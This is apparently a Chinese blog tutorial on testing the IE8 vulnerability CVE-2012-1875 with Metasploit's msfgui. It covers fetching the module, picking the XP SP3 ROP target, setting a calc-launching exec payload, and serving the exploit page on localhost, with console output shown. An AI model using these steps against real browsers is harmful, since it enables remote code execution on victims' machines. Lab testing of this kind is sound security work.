使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)

        本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。

        1、rb文件下载地址http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb

        2、把下载回来的rb文件放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong文件夹下面,你也可以不改名,或者放到已有的文件夹下面,但是一定要放到exploits下面,你懂的。

        3、在msfgui界面上,使用File菜单Search选项,搜索2012-1875,如图,不出意外应该是可以搜索到的啊!


        4、选中搜到的条目,具体就是上面的magictong/cve-2012-1875 - Normal,然后点击Launch按钮,进入配置页面。


        5、在配置页面,首先选择Targets,我的目标系统是xpsp3,我选择了IE 8 on Windows XP SP3 with msvcrt ROP,因为这个漏洞要过DEP,因此利用会麻烦点。


        6、然后选择Payload,这里选择了exec,启动calc(计算器)。SRVHOST里面输入本机(MSF所在的机器,不是有漏洞的机器,如果有漏洞机器就是MSF所在的机器,则输入127.0.0.1即可)的局域网IP,如果直接在本机测试,输入127.0.0.1即可。


        7、然后点击Run inConsole ,等待,直到msfgui的主界面下console TAB页打出如下信息:

msf  exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875
msf  exploit(cve-2012-1875) > set TARGET 1
TARGET => 1
msf  exploit(cve-2012-1875) > set PAYLOAD windows/exec
msf  exploit(cve-2012-1875) > set CMD calc
PAYLOAD => windows/exec
CMD => calc
msf  exploit(cve-2012-1875) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf  exploit(cve-2012-1875) > exploit
[*] Exploit running as background job.
[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv
[*] Server started.

        8、现在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本机进行测试了。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值